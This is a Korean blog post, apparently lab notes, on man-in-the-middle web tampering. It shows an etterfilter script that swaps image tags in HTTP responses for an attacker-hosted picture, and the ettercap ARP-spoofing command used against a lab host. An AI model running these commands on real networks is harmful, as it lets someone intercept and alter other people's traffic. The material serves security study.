*Web 정보 변조
MITM 공격
- 두 개체 간 통신에 끼어서 데이터 끼워넣기/빼기/복호화 등 데이터 흐름에 영향을 미치는 공격
- ARP 리다이렉트, ICMP 리다이렉트, ARP 스푸핑 모두 엄밀히 말하면 MITM 공격이지만 일반적으로 MITM 공격을 말할 때는 이 세 가지 공격을 언급하지는 않음
- ARP 리다이렉트, ICMP 리다이렉트, ARP 스푸핑 공격은 우선 전달되는 패킷의 MAC이나 IP 주소는 바꾸나 패킷 내용을 바꾸지는 않지만 MITM은 패킷 내용을 바꾸는 것도 시도
*Web 정보 변조 실습
공격에 쓰일 웹서버가 작동하는지 확인한다.
URL은 그림 파일을 직접 지정한다.
*Ettercap 설치
이더필터(etterfilter)를 이용
Web 정보를 중간에 변조해보자
Etterfilter를 포함한 ettercap패키지를
설치한다.
epel에서 제공하며 CentOS5 까지 0.7.3 버전이
제공된다. CentOS6 이후는
0.7.5(IPv6)버전이 제공된다.
CentOS5의 레파지토리 주소가
바뀌었다.
- /etc/yum.repos.d/CentOS-Base.repo 파일 수정
- 기존에 mirrorlist와 baseurl을 모두 #으로 마킹한다.
- 각 항목에 아래와 같은 새 baseurl을 추가한다.
*필터 파일 생성
필터 파일 생성 : filter.txt
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img
src=\"http://192.168.11.17/sb1.png\"");
replace("IMG SRC=", "img
src=\"http://192.168.11.17/sb1.png\"");
msg("Replaced the pic. \n");
}
필터
파일 컴파일
# etterfilter -o filter.ef filter.txt
Filter file을 생성하고
컴파일한다.
*MITM 공격
ettercap 을 이용 공격을
시작한다.
- ettercap는 ARP 스푸핑과 fragreouter 기능을 동시에 수행한다.
ettercap
-T -q -F filter.ef -M ARP /192.168.11.7/ //
- 0.7.5 버전은 IPv6를 위한 버전이 IP뒤에 //를 붙인다.
ettercap 을 이용 공격을
시작한다.
*Web 정보 변조 실습
대부분의 사이트는 공격이 되지 않는다.
댓글 없음:
댓글 쓰기